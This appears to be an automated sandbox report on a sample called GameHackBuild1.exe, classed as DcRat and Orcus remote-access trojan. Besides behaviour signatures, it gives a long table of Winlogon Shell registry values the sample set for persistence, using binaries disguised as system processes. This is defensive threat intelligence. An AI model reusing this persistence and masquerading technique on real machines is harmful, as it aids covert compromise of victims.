Analysis Overview
SHA256
221ec8caee4804b4c9e4ced2e1f03be897bc1993d7898b2bdc00f90a093eb87d
Threat Level: Known bad
The file GameHackBuild1.exe.bin.exe was found to be: Known bad.
Malicious Activity Summary
Modifies WinLogon for persistence
Process spawned unexpected child process
Orcus
Orcus main payload
Orcus family
DcRat
Dcrat family
Orcurs Rat Executable
DCRat payload
Command and Scripting Interpreter: PowerShell
Loads dropped DLL
Executes dropped EXE
Checks computer location settings
Adds Run key to start application
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Windows directory
Drops file in Program Files directory
Unsigned PE
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: CmdExeWriteProcessMemorySpam
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Scheduled Task/Job: Scheduled Task
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2025-01-13 12:34
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-01-13 12:34
Reported
2025-01-13 12:36
Platform
win7-20240903-en
Max time kernel
150s
Max time network
146s
Command Line
Signatures
DcRat
Dcrat family
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\", \"C:\\Windows\\Offline Web Pages\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\", \"C:\\Windows\\Offline Web Pages\\conhost.exe\", \"C:\\Users\\Default\\audiodg.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\", \"C:\\Users\\Default User\\conhost.exe.exe\", \"C:\\Program Files\\Uninstall Information\\MSBuild.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\csrss.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\", \"C:\\Windows\\Offline Web Pages\\conhost.exe\", \"C:\\Users\\Default\\audiodg.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\", \"C:\\Users\\Default User\\conhost.exe.exe\", \"C:\\Program Files\\Uninstall Information\\MSBuild.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\dllhost.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\", \"C:\\Windows\\Offline Web Pages\\conhost.exe\", \"C:\\Users\\Default\\audiodg.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\", \"C:\\Users\\Default User\\conhost.exe.exe\", \"C:\\Program Files\\Uninstall Information\\MSBuild.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\dllhost.exe\", \"C:\\Program Files\\Windows Photo Viewer\\audiodg.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\Users\\Public\\Favorites\\lsass.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\winlogon.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Runtime\\x86\\wininit.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\", \"C:\\Windows\\Offline Web Pages\\conhost.exe\", \"C:\\Users\\Default\\audiodg.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\", \"C:\\Users\\Default User\\conhost.exe.exe\", \"C:\\Program Files\\Uninstall Information\\MSBuild.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\dllhost.exe\", \"C:\\Program Files\\Windows Photo Viewer\\audiodg.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\Users\\Public\\Favorites\\lsass.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\winlogon.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Runtime\\x86\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\lsm.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\lsass.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\taskhost.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\csrss.exe\", \"C:\\Windows\\de-DE\\conhost.exe.exe\", \"C:\\Windows\\security\\templates\\audiodg.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\audiodg.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\", \"C:\\Windows\\Offline Web Pages\\conhost.exe\", \"C:\\Users\\Default\\audiodg.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\", \"C:\\Windows\\Offline Web Pages\\conhost.exe\", \"C:\\Users\\Default\\audiodg.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\", \"C:\\Users\\Default User\\conhost.exe.exe\", \"C:\\Program Files\\Uninstall Information\\MSBuild.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\", \"C:\\Windows\\Offline Web Pages\\conhost.exe\", \"C:\\Users\\Default\\audiodg.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\", \"C:\\Users\\Default User\\conhost.exe.exe\", \"C:\\Program Files\\Uninstall Information\\MSBuild.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\dllhost.exe\", \"C:\\Program Files\\Windows Photo Viewer\\audiodg.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\", \"C:\\Windows\\Offline Web Pages\\conhost.exe\", \"C:\\Users\\Default\\audiodg.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\", \"C:\\Users\\Default User\\conhost.exe.exe\", \"C:\\Program Files\\Uninstall Information\\MSBuild.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\dllhost.exe\", \"C:\\Program Files\\Windows Photo Viewer\\audiodg.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\Users\\Public\\Favorites\\lsass.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\", \"C:\\Windows\\Offline Web Pages\\conhost.exe\", \"C:\\Users\\Default\\audiodg.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\", \"C:\\Users\\Default User\\conhost.exe.exe\", \"C:\\Program Files\\Uninstall Information\\MSBuild.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\dllhost.exe\", \"C:\\Program Files\\Windows Photo Viewer\\audiodg.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\Users\\Public\\Favorites\\lsass.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\winlogon.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Runtime\\x86\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\lsm.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\lsass.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\taskhost.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\", \"C:\\Windows\\Offline Web Pages\\conhost.exe\", \"C:\\Users\\Default\\audiodg.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\", \"C:\\Users\\Default User\\conhost.exe.exe\", \"C:\\Program Files\\Uninstall Information\\MSBuild.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\dllhost.exe\", \"C:\\Program Files\\Windows Photo Viewer\\audiodg.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\Users\\Public\\Favorites\\lsass.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\winlogon.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Runtime\\x86\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\lsm.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\lsass.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\taskhost.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\csrss.exe\", \"C:\\Windows\\de-DE\\conhost.exe.exe\", \"C:\\Windows\\security\\templates\\audiodg.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\", \"C:\\Windows\\Offline Web Pages\\conhost.exe\", \"C:\\Users\\Default\\audiodg.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\", \"C:\\Windows\\Offline Web Pages\\conhost.exe\", \"C:\\Users\\Default\\audiodg.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\", \"C:\\Users\\Default User\\conhost.exe.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\", \"C:\\Windows\\Offline Web Pages\\conhost.exe\", \"C:\\Users\\Default\\audiodg.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\", \"C:\\Users\\Default User\\conhost.exe.exe\", \"C:\\Program Files\\Uninstall Information\\MSBuild.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\dllhost.exe\", \"C:\\Program Files\\Windows Photo Viewer\\audiodg.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\", \"C:\\Windows\\Offline Web Pages\\conhost.exe\", \"C:\\Users\\Default\\audiodg.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\", \"C:\\Users\\Default User\\conhost.exe.exe\", \"C:\\Program Files\\Uninstall Information\\MSBuild.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\dllhost.exe\", \"C:\\Program Files\\Windows Photo Viewer\\audiodg.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\Users\\Public\\Favorites\\lsass.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\winlogon.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Runtime\\x86\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\lsm.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\", \"C:\\Windows\\Offline Web Pages\\conhost.exe\", \"C:\\Users\\Default\\audiodg.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\", \"C:\\Users\\Default User\\conhost.exe.exe\", \"C:\\Program Files\\Uninstall Information\\MSBuild.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\dllhost.exe\", \"C:\\Program Files\\Windows Photo Viewer\\audiodg.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\Users\\Public\\Favorites\\lsass.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\winlogon.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Runtime\\x86\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\lsm.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\lsass.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\", \"C:\\Windows\\Offline Web Pages\\conhost.exe\", \"C:\\Users\\Default\\audiodg.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\", \"C:\\Users\\Default User\\conhost.exe.exe\", \"C:\\Program Files\\Uninstall Information\\MSBuild.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\", \"C:\\Windows\\Offline Web Pages\\conhost.exe\", \"C:\\Users\\Default\\audiodg.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\", \"C:\\Users\\Default User\\conhost.exe.exe\", \"C:\\Program Files\\Uninstall Information\\MSBuild.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\dllhost.exe\", \"C:\\Program Files\\Windows Photo Viewer\\audiodg.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\Users\\Public\\Favorites\\lsass.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\winlogon.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
